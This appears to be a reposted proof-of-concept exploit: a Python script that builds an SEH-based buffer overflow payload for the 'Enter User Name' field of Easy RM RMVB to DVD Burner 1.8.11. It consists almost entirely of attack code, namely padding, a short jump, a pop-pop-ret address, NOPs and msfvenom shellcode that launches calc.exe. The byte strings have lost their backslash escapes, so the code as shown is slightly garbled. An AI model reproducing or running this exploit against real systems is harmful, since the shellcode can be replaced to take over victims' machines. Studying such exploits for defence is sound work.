Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

#!/usr/bin/python

#================================== #!/usr/bin/python

#========================================================================================================================
# Exploit Author : Touhid M.Shaikh
# Exploit Title : Easy RM RMVB to DVD Burner 1.8.11 - 'Enter User
Name' Field Buffer Overflow (SEH)
# Date : 28-08-2017
# Website : www.touhidshaikh.com
# Contact : https://github.com/touhidshaikh
# Vulnerable Software: Easy RM RMVB to DVD Burner
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.8.11
# Software Link: http://www.divxtodvd.net/easy_rm_to_dvd.exe
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of calc.txt
#
#========================================================================================================================


buffer = "x41" * 1008

nSEH = "xebx10x90x90"

# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ}
[SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "x59x78x03x10"

badchars = "x00x0ax0d" # and 0x80 to 0xff

# msfvenom -p windows/exec CMD=calc.exe -b "x00x0ax0d" -f python
buf = ""
buf += "xdaxd7xd9x74x24xf4xbax07xc8xf9x11x5ex2b"
buf += "xc9xb1x31x31x56x18x03x56x18x83xeexfbx2a"
buf += "x0cxedxebx29xefx0exebx4dx79xebxdax4dx1d"
buf += "x7fx4cx7ex55x2dx60xf5x3bxc6xf3x7bx94xe9"
buf += "xb4x36xc2xc4x45x6ax36x46xc5x71x6bxa8xf4"
buf += "xb9x7exa9x31xa7x73xfbxeaxa3x26xecx9fxfe"
buf += "xfax87xd3xefx7ax7bxa3x0exaax2axb8x48x6c"
buf += "xccx6dxe1x25xd6x72xccxfcx6dx40xbaxfexa7"
buf += "x99x43xacx89x16xb6xacxcex90x29xdbx26xe3"
buf += "xd4xdcxfcx9ex02x68xe7x38xc0xcaxc3xb9x05"
buf += "x8cx80xb5xe2xdaxcfxd9xf5x0fx64xe5x7exae"
buf += "xabx6cxc4x95x6fx35x9exb4x36x93x71xc8x29"
buf += "x7cx2dx6cx21x90x3ax1dx68xfexbdx93x16x4c"
buf += "xbdxabx18xe0xd6x9ax93x6fxa0x22x76xd4x5e"
buf += "x69xdbx7cxf7x34x89x3dx9axc6x67x01xa3x44"
buf += "x82xf9x50x54xe7xfcx1dxd2x1bx8cx0exb7x1b"
buf += "x23x2ex92x7fxa2xbcx7exaex41x45xe4xae"

nops = "x90" * 16

data = buffer + nSEH + SEH + nops + buf

f = open ("calc.txt", "w")
f.write(data)
f.close()

#Greetz => Jack Carlo